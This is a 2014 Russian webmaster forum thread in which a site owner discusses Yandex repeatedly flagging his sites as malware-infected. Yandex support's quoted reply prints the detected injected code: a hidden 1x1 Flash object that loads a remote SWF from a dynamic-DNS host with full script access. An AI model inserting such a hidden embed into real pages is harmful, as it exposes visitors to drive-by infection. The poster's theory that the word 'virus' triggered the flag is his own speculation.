X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Яндекс считает сайт зараженным
Den1xxx
Den1xxx
Topic Starter сообщение 10.2.2014, 17:01; Ответить: Den1xxx
Сообщение #1


Здравствуйте.
Странная ситуация.
Яндекс считает сайт зараженным.
Вот эта страница сайта http://dome.by/
Модуль форума на этом сайте отключил, дождался проверки — пишет опять заражен! И заражен вот этим: http://help.yandex.ru/webmaster/security/v...l#yandex-maltds
Я в шоке.

PS
1. Сайт только переехал между доменами.
2. Движок оригинальный, такие школота не ломает, ибо дорого.
3. Грешу на подключаемые сторонние скрипты, но они парсятся с google и ui серверов.
Как-бы надежные товарищи, не замеченные в этом.
Ситуация странная:)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Den1xxx
Den1xxx
Topic Starter сообщение 18.2.2014, 19:40; Ответить: Den1xxx
Сообщение #2


Продолжение.
В результате обращения для неоднократной перепроверки сайт все равно оказывался «заражённым».
Я 11.02 напрямую отрубил зараженную страницу путем следующего кода:
[PHP]
if (isset($_GET['module'])) {
$mod = $_GET['module'];
if ($mod == 'forum')
exit(0);
}
[/PHP]
В результате вместо страницы сайта показывается просто белый чистый лист.
Написал в техподдержку. Пришел ответ:
Здравствуйте, Денис!

В настоящий момент с Вашим сайтом все в порядке, он успешно прошёл перепроверку. Пометка в результатах поиска должна автоматически исчезнуть в течение нескольких часов.

Обнаруженный на сайте вредоносный код выглядел следующим образом:

<object width="1" height="1" style="position: absolute;"><param name="allowScriptAccess" value="always" /><param name=movie value="http://rdomn1390297589.hopto.me/appSound.swf" /><embed allowScriptAccess="always" src="http://rdomn1390297589.hopto.me/appSound.swf" type="application/x-shockwave-flash"></embed></object>

--
Просим Вас высказать свое мнение о полученном ответе: http://feedback2.yandex.ru/appraisal.xml?session=ce.................

С уважением, Платон Щукин
Служба поддержки Яндекса
http://help.yandex.ru/

Никакого такого кода на сайте не было, никогда.
И сайта, на который ведёт объект, тоже нет.
Я в непонятках. С одной стороны — решилось и хорошо. Но просто непонятно — как такое может быть?
Прошло пару дней и другая страница другого сайта, опять в опале — http://argo.into.by/?module=fnprnt&artid=263
Это страница сайта «для печати». Из неё вырезаны скрипты и стили, откуда там вредонос???
Нет там ничего. Написал опять в Яндекс, пришло письмо, краткий смысл такой:
— У Вас заражен сервер, на сайте всё нормально.
Вот я думаю — как может Яша знать, что у меня ЗАРАЖЁН СЕРВЕР, если НЕ ВИДИТ вредоносного кода НА САЙТЕ?
У него ведь нет доступа к сайту — он видит только код.
Или я идиот?
При этом сайт argo.into.by при поиске в Яндексе обозначается заражённым...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Den1xxx
Den1xxx
Topic Starter сообщение 18.2.2014, 19:44; Ответить: Den1xxx
Сообщение #3


Кажется я догадался!
Страница http://argo.into.by/?module=fnprnt&artid=263 — о фильтрах для воды, и на ней 3 раза повторяется слово «вируc»!!!
Ураааа! Теперь я знаю как забанить в Яндексе любой сайт, где разрешены комментарии!!!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Den1xxx
Den1xxx
Topic Starter сообщение 18.2.2014, 19:51; Ответить: Den1xxx
Сообщение #4


Заменил на сайте слово «в и р у с» (да, целиком теперь писать боюсь), русскую «р» на английскую «p»
Посмотрим теперь на результат:)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Webmaster_hb
Webmaster_hb
сообщение 19.2.2014, 0:35; Ответить: Webmaster_hb
Сообщение #5


Den1xxx, в яндекс писали уже?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Den1xxx
Den1xxx
Topic Starter сообщение 19.2.2014, 8:26; Ответить: Den1xxx
Сообщение #6


(Webmaster_hb @ 19.2.2014, 03:35) *
Den1xxx, в яндекс писали уже?

Писал, см. топик выше

(Den1xxx @ 18.2.2014, 22:40) *
Написал опять в Яндекс, пришло письмо, краткий смысл такой:
— У Вас заражен сервер, на сайте всё нормально.

Итак, итог эксперимента.
На сайте заменил слово «в и р у с» (но только без пробелов) на такое же, но с английской раскладкой «p».
Результат:
Вредоносный код на сайте не обнаружен

Гениально!

[B]Webmaster[/B], стоит внести это слово в стоп-слова
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Licoric
Licoric
сообщение 20.2.2014, 13:22; Ответить: Licoric
Сообщение #7


вирус вирус вирус
Стало интересно проверить)))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Den1xxx
Den1xxx
Topic Starter сообщение 20.2.2014, 14:03; Ответить: Den1xxx
Сообщение #8


(Licoric @ 20.2.2014, 16:22) *
Стало интересно проверить)))

Лучше б на своих сайтах проверяли, а то мало ли что...
Я в поддержку Яши отписал конечно же, но ответа (конечно же) нет — вряд ли можно будет признаться в подобном косяке.
Если исправят по-тихому, это уже будет хорошо...
И я не думаю что Ваш без смысла текст сработает — на той странице всё-таки он был разбавлен и осмыслен.
Впрочем увидим:)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Licoric
Licoric
сообщение 20.2.2014, 14:30; Ответить: Licoric
Сообщение #9


Думаю, что в интернете много форумов, которые обсуждают вирусы в том или ином варианте. И на страничке в осмысленном тексте явно много раз встречается слово "вирус". И никто их за это не считает подозрительными. Глупо.
В общем да - проверим)))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Den1xxx
Den1xxx
Topic Starter сообщение 20.2.2014, 19:12; Ответить: Den1xxx
Сообщение #10


Пришёл ответ от Яндекса
Здравствуйте, ...!

Описанная Вами ситуация не может быть причиной, из-за которой Ваш сайт периодически помечается как угрожающий безопасности. Рекомендуем воспользоваться нашими рекомендациями с предыдущего письма и проверить серверные файлы еще раз.

--
Просим Вас высказать свое мнение о полученном ответе: http://feedback2.yandex.ru/appraisal.xml?session=/////////

С уважением, Платон Щукин
Служба поддержки Яндекса
http://help.yandex.ru/

Это написано мне после того, как я:
1. Заменил 1 букву в слове в 3 местах. На сервере ничего не делал — у меня нет доступа к серверу.
2. Послал сайт на перепроверку.
3. Сайт разбанили. См. http://yandex.by/yandsearch?lr=155&text=argo.into.by — вирусов уже нет.
Что думает уважаемое сообщество по этому поводу?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
23 hollywooduk 5096 27.3.2024, 10:43
автор: hollywooduk
Открытая тема (нет новых ответов) Тысячи ботовых переходов на сайт
18 Suagaring 4538 26.3.2024, 21:42
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Аналоги Яндекс Директ
3 kuz999 1675 26.3.2024, 14:12
автор: knezevolk
Открытая тема (нет новых ответов) Блог: городской сми сайт в Прибалтике
23 kapusta1 3534 24.3.2024, 22:02
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы[Услуги] Баннер/Графика/Сайт
238 FillPlay 179394 23.3.2024, 16:31
автор: freeax


 



RSS Текстовая версия Сейчас: 29.3.2024, 11:53
Дизайн